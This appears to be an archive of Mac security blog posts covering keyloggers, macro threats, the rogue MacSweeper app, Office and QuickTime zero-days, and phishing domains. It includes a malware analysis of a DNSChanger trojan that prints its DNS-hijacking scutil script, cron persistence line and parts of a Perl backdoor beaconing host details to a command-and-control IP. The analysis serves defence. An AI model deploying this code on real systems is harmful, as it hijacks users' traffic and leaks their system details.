Archive
Snoop, Sneak, Sniff
Mac users are more likely to be affected by tracking threats than by malware.
Why? Let's start by defining what a tracking threat is.
Tracking threats are software or applications that snoop on a user's activity, sneak passwords and sniff out private information. Software such as keyloggers and sniffers is considered a tracking threat, and it is widely available on the internet.
This type of software is also classified as grayware. Grayware is not considered malware and is not even dangerous by itself. However, just like a kitchen knife, if it falls into the wrong hands it definitely poses a threat to the user and to other people as well.
LogKext is the only kernel-based freeware keylogger for Mac OS X. It is controlled by a command-line client called logKextClient.

LogKext.pkg is the installer; it contains eight different packages. During the installation process, the user is required to enter the administrator or root user password to authenticate.
Below are the packages and their descriptions.
logkextdaemon.pkg – This package contains logKextDaemon, which is in Mac universal binary format. This binary is a daemon program that runs in the background and manages the keylogging activity.
logkextkeymap.pkg – This package contains a property list file, logKextKeymap.plist. The list includes identifiable keys such as numbers, letters (upper and lower case) and other characters.
Logkext-1.pkg – This package contains another package named LogKext.kext, which contains a binary file, LogKext. LogKext is the main program, responsible for intercepting keyboard events using the IOHIDSystem and IOHIKeyboard classes in the kernel.
logkextReadme.pkg – This package contains LogKext Readme.html, which includes an install and uninstall guide, release notes and frequently asked questions.
logkextuninstall.pkg – This package contains LogKextUninstall.command, a terminal shell script that stops logKext from running and removes its related files.
The packages were installed in this order:
logKext.pkg/Contents/Packages/logkextuninstall.pkg
logKext.pkg/Contents/Packages/logkext.pkg
logKext.pkg/Contents/Packages/logkextkeymap.pkg
logKext.pkg/Contents/Packages/logkext-1.pkg
logKext.pkg/Contents/Packages/logkextdaemon.pkg
logKext.pkg/Contents/Packages/logkextclient.pkg
logKext.pkg/Contents/Packages/logkextkeygen.pkg
The following files were created:
LogKext Readme.html
/Library/Application Support/logKext/logKextDaemon
/Library/Application Support/logKext/logKextKeyGen
/Library/Application Support/logKext/logKextKeymap.plist
This program can monitor and record the user's keystrokes, including usernames, passwords, PII, private conversations, typed-in URLs and more.
So, imagine this piece of software getting into the wrong hands.
It is scarier still when you think you have downloaded and installed a clean application, but behind the undocumented details there are hidden or unexplained features working in the background.
Let's take a look at Keylogger X.
Downloaded file: KeyloggerX.dmg.sit (768,805 bytes)
Inside this image are the following files:
Disclaimer.rtf – This document informs the user that "You are held responsible for your actions". Check the full disclaimer here.
Keylogger X – This is the binary file, in Preferred Executable Format (PEF; the file signature starts with "Joy!peffpwpc").
Read Me.rtf – This document describes the program as follows: "Keylogger X is designed to run on OSX. The logged file is saved in the users preference folder called "User Preferences"."
OK, let's run the program and check. Oops, there's nothing on your screen, and you cannot even find a "User Preferences" folder. Where is it? Nobody knows!
Is it running in the background?

Upon checking the code, this program imports 3 containers with over 900 imported symbols, including multimedia and networking functions.
In the data section, you will find more interesting strings.

Congratulations! You just installed a "more efficient keylogger".
The behavior of this program is not acceptable, and it is an absolutely real threat to users.
Let’s Go Retro with Macro
What is a Macro?
How is a Macro created?
There are two ways:
For example, I want to display the words "Useful Macro" in a Word document whenever I type the shortcut key Control+R. This can be done by simply recording it. Check the screenshot here.
By default this is stored in Normal.dot, which means the recorded macro works in every single document opened.
Advanced macros use Visual Basic for Applications programming.
For further discussion, you can check your favorite search engine with the following keywords: VBA, Visual Basic for Applications programming, Macros with VBE
What makes a Macro a threat?
How would you know if a document has macros?
MS Office displays the warning below if the document you are trying to open has macros.
You can simply choose "Disable Macros" and continue working with the document.
You can also view the macro code in the Visual Basic Editor by pressing "Alt+F11".
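A way to answer the question "does this document have macros?" without opening it in Office, as an added example that is not part of the original post. It checks the two container formats Office uses: the zip-based 2007+ packages, where VBA is stored as a vbaProject.bin part, and the legacy OLE compound files, where the VBA storage names are scanned for as a heuristic (a full OLE directory parse is out of scope here). All sample files below are constructed in memory and are not real documents.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File (legacy .doc/.xls/.ppt) signature
# In an OLE document, VBA lives in storages/streams with these names; the directory stores
# them as UTF-16LE. Scanning the raw bytes for them is a heuristic, not a full OLE parse.
OLE_VBA_MARKERS = [n.encode("utf-16-le") for n in ("_VBA_PROJECT", "PROJECTwm", "Macros")]


def classify_office_file(data):
    """Return one of: ooxml-macro, ooxml-clean, ole-macro-heuristic, ole-no-marker, other."""
    if data[:4] == b"PK\x03\x04":
        # Office 2007+ (.docm/.xlsm/.pptm) is a zip; macros are stored as vbaProject.bin
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = [n.lower() for n in zf.namelist()]
        if any(n.endswith("vbaproject.bin") for n in names):
            return "ooxml-macro"
        return "ooxml-clean"
    if data[:8] == OLE_MAGIC:
        if any(marker in data for marker in OLE_VBA_MARKERS):
            return "ole-macro-heuristic"
        return "ole-no-marker"
    return "other"


def has_macros(data):
    return classify_office_file(data) in ("ooxml-macro", "ole-macro-heuristic")


def _make_ooxml(with_macro):
    # Constructed sample: a minimal zip mimicking the OOXML package layout (not a real document)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder")
    return buf.getvalue()


def _make_ole(with_marker):
    # Constructed sample: only the OLE signature plus (optionally) a directory-entry name;
    # enough to exercise the heuristic, not a valid compound file
    body = OLE_MAGIC + b"\x00" * 56
    if with_marker:
        body += "_VBA_PROJECT".encode("utf-16-le")
    return body + b"\x00" * 64


SAMPLES = {
    "report.docm": _make_ooxml(True),
    "report.docx": _make_ooxml(False),
    "legacy.doc": _make_ole(True),
    "legacy-clean.doc": _make_ole(False),
    "notes.txt": b"plain text, not an Office file",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:18} {classify_office_file(blob):22} macros={has_macros(blob)}")
```

Run it on a real file by passing the file's bytes to classify_office_file. Note the limits: the OLE check is a string heuristic and will miss obfuscated or unusual layouts, and Excel 4.0 macro sheets are not VBA, so they are not found by either branch.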
Below are screenshots of real malicious macros in Word, Excel and PowerPoint.
In summary, malicious macros are cross-platform threats. They can run on and damage both Mac and Windows PCs. Awareness of these threats is very important in protecting our daily computing lives.
A Deeper Look On MacSweeper
Do you think MacSweeper is not a rogue application? OK, let's take a deeper look and see what it does.
::::::::::::
File Size
::::::::::::
MacSweeperSetup.dmg 1.5 MB (1,600,201 bytes)
MacSweeper.app 2.6 MB (2,563,303 bytes)
:::::::::::::::::
Installation
:::::::::::::::::

Behind this page are an SWF Flash file and JavaScript that record the traffic and clicks.
After the fake display of a scanning process, this bogus website displays an alert box.

Clicking "Ok" triggers the download of MacSweeperSetup.dmg. Inside this DMG file is the rogue application, MacSweeper.app.
MacSweeper does not require the root/admin password to execute, and it remains in the Downloads folder unless the user manually drags it to another location.
::::::::::::::
Network
::::::::::::::
DNS lookup information for http://www.macsweeper.com:
http://www.macsweeper.com. A 217.20.175.39
ns1.vici.au NS 217.20.175.157
ns2.vici.au NS 217.20.182.29
alt1.aspmx.l.google.com MX 209.85.147.27
alt2.aspmx.l.google.com MX 64.233.185.27
aspmx.l.google.com MX 66.249.93.27
Cleanator is a rogue application that works on the Windows platform.
:::::::::::::::::::::::::::::::
Behaviour & Analysis
:::::::::::::::::::::::::::::::
Most of the files inside MacSweeper.app are image files (in PNG format). Let's check the other files …
PkgInfo contains the string "APPL????"
Database.plist contains 6390 cookie entries that look like this:
Cookie
YMR6LmFmdGVyZGF3bi5uZXQ
TODO.txt contains a list of things to do, including the application's current limitations, bugs and features. An interesting item from this text file is this:
“18. When update in process arert of new version can come, and fuck everithing”
You may check the complete list here.
Info.plist contains the following strings:
Package Type: APPL
Executable: MacSweeper
The file MacSweeper inside the MacOS folder is a binary in universal binary format, which means it can run on both PPC and x86.
From the screenshot above, you would think that this application has scanned your system for unwanted files. However, in the background, MacSweeper executes the following shell commands (the %@ tokens are format placeholders that the program fills in at runtime):
file -f /private/tmp/com.MacSweeper.found.tmp -kn | grep 'universal binary' | sed -e 's/: *Mach.*//g' > /private/tmp/com.MacSweeper.found2.tmp;
exit;
lipo "%@" -thin %@ -output "%@.lipo" && mv -f "%@.lipo" "%@";
During the scanning process, it drops the following temporary files:
/private/tmp/com.MacSweeper.found.tmp
/private/tmp/com.MacSweeper.found2.tmp
It then uses these files to display the scan result. This application does not scan for unwanted files; instead, it gives you a list of legitimate files installed on your system.
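To see what that "scan" really finds, here is a small header classifier, added as an example that is not part of the original post or of MacSweeper's code. It does by hand what `file` does for the three formats this page mentions: the universal (fat) binary that MacSweeper's grep matches, a thin Mach-O, and the older PEF container that Keylogger X uses (the "Joy!peff" signature). Every header below is constructed, not taken from a real file.

```python
import struct

FAT_MAGIC = 0xCAFEBABE                      # universal (fat) binary header, always big-endian
MACHO_MAGICS = {0xFEEDFACE: "Mach-O 32-bit", 0xFEEDFACF: "Mach-O 64-bit"}
CPU_NAMES = {7: "i386", 0x01000007: "x86_64", 18: "ppc", 0x01000012: "ppc64",
             12: "arm", 0x0100000C: "arm64"}


def identify(header):
    """Classify the first bytes of a file: PEF, universal binary, thin Mach-O, or other."""
    # Classic PEF container (the Keylogger X format): 'Joy!' 'peff' then the architecture tag
    if header[:8] == b"Joy!peff":
        return "PEF " + header[8:12].decode("ascii", "replace")
    if len(header) < 8:
        return "other"
    magic_be, second_be = struct.unpack(">II", header[:8])
    if magic_be == FAT_MAGIC:
        nfat = second_be
        # Java class files share 0xCAFEBABE; their version field gives an implausible arch count
        if nfat == 0 or nfat > 20:
            return "other (CAFEBABE but not a fat header)"
        if len(header) < 8 + 20 * nfat:
            return "universal binary (truncated header)"
        archs = []
        for i in range(nfat):
            off = 8 + 20 * i
            cputype, _subtype, _offset, _size, _align = struct.unpack(">IIIII", header[off:off + 20])
            archs.append(CPU_NAMES.get(cputype, hex(cputype)))
        return "universal binary [" + ", ".join(archs) + "]"
    # Thin Mach-O: the magic is stored in the slice's native byte order (ppc big-endian, x86 little-endian)
    for order in (">", "<"):
        magic, cputype = struct.unpack(order + "II", header[:8])
        if magic in MACHO_MAGICS:
            return f"{MACHO_MAGICS[magic]} {CPU_NAMES.get(cputype, hex(cputype))}"
    return "other"


def fat_arch(cputype, offset, size):
    """Build one constructed fat_arch entry (cputype, cpusubtype, offset, size, align)."""
    return struct.pack(">IIIII", cputype, 0, offset, size, 12)


# Constructed headers (not real files): a ppc/i386 universal binary like the page's MacSweeper,
# a thin i386 Mach-O, a thin ppc Mach-O, a PEF like Keylogger X, and a Java class for contrast
SAMPLES = {
    "MacSweeper": struct.pack(">II", FAT_MAGIC, 2) + fat_arch(18, 4096, 100000) + fat_arch(7, 110592, 100000),
    "thin-i386": struct.pack("<II", 0xFEEDFACE, 7) + b"\x00" * 20,
    "thin-ppc": struct.pack(">II", 0xFEEDFACE, 18) + b"\x00" * 20,
    "Keylogger X": b"Joy!peffpwpc" + b"\x00" * 28,
    "Foo.class": struct.pack(">IHH", FAT_MAGIC, 0, 52) + b"\x00" * 16,
}


def scan_file(path):
    """Read just the header of a real file on disk and classify it."""
    with open(path, "rb") as f:
        return identify(f.read(8 + 20 * 20))


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:12} -> {identify(blob)}")
```

The point for a user: every "universal binary" hit is simply a normal application or library built for both PPC and x86, which is exactly what the page says MacSweeper is listing as "unwanted".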
And it does not end here: a few minutes after displaying the scan result, it shows a nagging screen, as shown below:
What! A privacy violation with your own legitimate files? That is absolutely not right.
From the code, this application unlocks more features and displays the message below once the user enters a valid serial code.
Thank You! You made me a bit hapier
Definitely, this application is not just a rogue application but also junkware.
QuickTime 7.4 Fixes Multiple Vulnerabilities
The vulnerabilities that were addressed include the following:
(1) Memory corruption in QuickTime’s handling of Sorenson 3 video files.
(2) Memory corruption in QuickTime’s handling of Macintosh Resource records in movie files.
(3) Memory corruption in QuickTime’s parsing of Image Descriptor (IDSC) atoms.
(4) Buffer overflow in processing a compressed PICT image.
Thus, QuickTime users are advised not to play streaming media that uses the RTSP protocol (rtsp://) until a fix is made available.
Zero Day Exploit: MS Excel Allows Remote Code Execution
A zero-day flaw has been found in Microsoft Excel, and the vulnerability affects the following versions:
Microsoft Office Excel 2003 Service Pack 2
Microsoft Office Excel Viewer 2003
Microsoft Office Excel 2002
Microsoft Office Excel 2000
Microsoft Excel 2004 for Mac
What causes this threat?
When a user opens a specially crafted Excel file that has malformed header information, the system encounters an unspecified error, which can be exploited by malicious users and could lead to execution of arbitrary code.
According to Microsoft, there are active attacks currently exploiting this vulnerability. Thus, users are advised not to open untrusted Excel files.
MacSweeper First Rogue Application in Mac
Beware! The first rogue application for the Mac is here.

Once the user clicks "Remove", it downloads MacSweeperSetup.dmg and installs MacSweeper.app, the rogue application.
There are two images, or looks, that link to this rogue application.
(1) The screenshot shown above is the image displayed when you visit this URL:
=maxc_clr07&cid=2271&parid=mc_346586211
Zero Day Exploit: Buffer-overflow in Quicktime Player
The zero-day vulnerability is triggered when QuickTime encounters an RTSP (Real-Time Streaming Protocol) link, e.g. rtsp://, with no custom port specified: it handles the request by connecting to port 554. However, if port 554 on the server is closed, QuickTime automatically switches to the HTTP protocol on port 80, where the server returns a 404 error message. If the HTTP error message returned by the server is very long, QuickTime's media link handling does not know how to deal with it because it lacks input validation, and this causes a buffer overflow.
This vulnerability can be exploited by a malicious application or website, which then allows execution of arbitrary code on the user's system.
Luigi Auriemma, an Italian security researcher, discovered this flaw and posted a bug report with proof-of-concept exploit code.
Analysis of OSX Trojan DNS Changer
::::::::::::
DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)
:::::::::::::::::
::::::::::::::::::::::::::::::::::

The disk image file is automatically mounted but not extracted. This means the user has to manually run the downloaded installer.
The downloaded installer, Install.pkg, contains the following files:
Info.plist is the first file read during the installation. This file contains detailed usage information and behavior such as:
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart
Followed by Archive.bom, which contains information about the files to install.
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq
It then accesses the files description.plist and PkgInfo, which give the following information:
Version: 1.0
Description: “Its a suppa puppa desc yo”
Title: MacCodec
PkgInfo: pmkrpkg1
Followed by BundleVersions.plist for version information.
The installer comes with a "License Agreement". Upon clicking "Continue", a message box is displayed requiring the user to click "Agree" to continue the installation process.
OK, let's look further at the malicious code.
postinstall and postupgrade contain exactly the same code, as do preinstall and preupgrade.
preinstall is invoked after the user agrees to the License Agreement. This trojan does not have a damaging payload; it only modifies the user's DNS settings. Let's check the code.
:::::::::::::::::::::::
Preinstall script:
s1=85.255.115.22
s2=85.255.112.190
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<<EOF
Using scutil, it retrieves the user's primary network service (interface) identifier.
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
It then sets the DNS name server IPs to s1=85.255.115.22 and s2=85.255.112.190.
/usr/sbin/scutil <<EOF
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit
EOF
**Take note: IP addresses may change per variant.
It checks the crontab for an entry referencing plugins.settings, located in "/Library/Internet Plug-Ins". This file is a marker; it indicates whether this trojan has been previously installed or not.
exist=`crontab -l|grep plugins.settings`
If plugins.settings is not present (meaning the trojan was not yet installed), the installation proceeds by dropping a temporary file, cron.inst:
echo "* * * * * \"$path/plugins.settings\">/dev/null 2>&1" > cron.inst
cron.inst then contains the crontab line written by that echo command.
It installs cron.inst using the crontab command.
crontab cron.inst
cron.inst executes another script, QuickTime.xpt, which is found at /Library/Internet Plug-Ins/:
"/Library/Internet Plug-Ins/QuickTime.xpt"
In the background, it creates a temporary file named 1.
>/dev/null 2>&1
QuickTime.xpt redirects its output to this file instead of showing errors or script commands on the user's screen.
Once cron.inst has been executed, the preinstall script deletes this temporary file.
rm -rf cron.inst
fi
QuickTime.xpt script:
This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to /Library/Internet Plug-Ins/.
Like the preinstall script, QuickTime.xpt checks the user's network information, attempts to modify the DNS name server settings, checks for the existence of QuickTime.xpt and, if it exists, creates cron.inst, executes it and deletes the temporary file, 1.
Postinstall script:
#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"
It executes sendreq, which is a Perl script, and then deletes it.
SendReq Script:
This Perl-based bot acts as a backdoor client component and communicates with a remote server through a socket.
#!/usr/bin/perl
use IO::Socket;
It uses MIME base64 encoding to transmit messages over HTTP. The page shows only the body of the encoder; the subroutine name below is assumed.
sub encode_base64 {   # sub name assumed; only the body appears in the original
    my $eol = $_[1];
    $eol = "\n" unless defined $eol;
    my $res = pack("u", $_[0]);   # uuencode first, then remap to the base64 alphabet
    # Remove first character of each line, remove newlines
    $res =~ s/^.//mg;
    $res =~ s/\n//g;
    $res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
    # fix padding at the end
    my $padding = (3 - length($_[0]) % 3) % 3;
    $res =~ s/.{$padding}$/'=' x $padding/e if $padding;
    # break encoded string into lines of no more than 76 characters each
    if (length $eol) {
        $res =~ s/(.{1,76})/$1$eol/g;
    }
    return $res;
}
The bot command-and-control server:
my $server="85.255.121.37";
**Take note: IP addresses may change per variant.
It executes the uname -p command to retrieve the victim's processor type, and hostname to get the host name associated with its IP address.
my $cmd='uname -p;echo ";";hostname';$cmd=~s/\n//g;
It encodes the gathered information, indicating "mac".
It then sends a request to the remote server.
This bot sends the request to the remote server, attempting to establish a connection through TCP port 80.
print $socket $request;
close($socket);
Captured packet looks like this:
It sends victim’s information in base64 encoded strings:
Decoded version:
Furthermore, later versions of this trojan's scripts are obfuscated, making it a little more difficult for security analysts and researchers to read the code.
::::::::::::::::
Trojan DNSChanger is as simple as changing DNS settings: no complication and no destructive behavior. These are simple scripts that are widely available online, built into a Mac installer and deployed to several existing fake codec domains.
The lesson here is that malware or threats on the Mac do not have to be complicated. With the vast amount of information available online, it is possible for an ordinary person without a programming background, also called a script kiddie, to cause interruption and damage to our daily lives.
Phish Facebook, Phish Myspace too!
Let's start with the screenshot below.
Let's perform a DNS lookup on the FQDN 371233.cn.
The screenshot below is a Myspace phishing site.
profile.myspace.com.fuseaction.user.viewprofile.9w.11523822.cn
profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn
profile.myspace.com.fuseaction.id.user.viewprofile.1878800.cn
In summary, phishing and scam spam are cross-platform web-based attacks. They aim to steal your identity and your money!
Mac and iPhone users are not exempt.











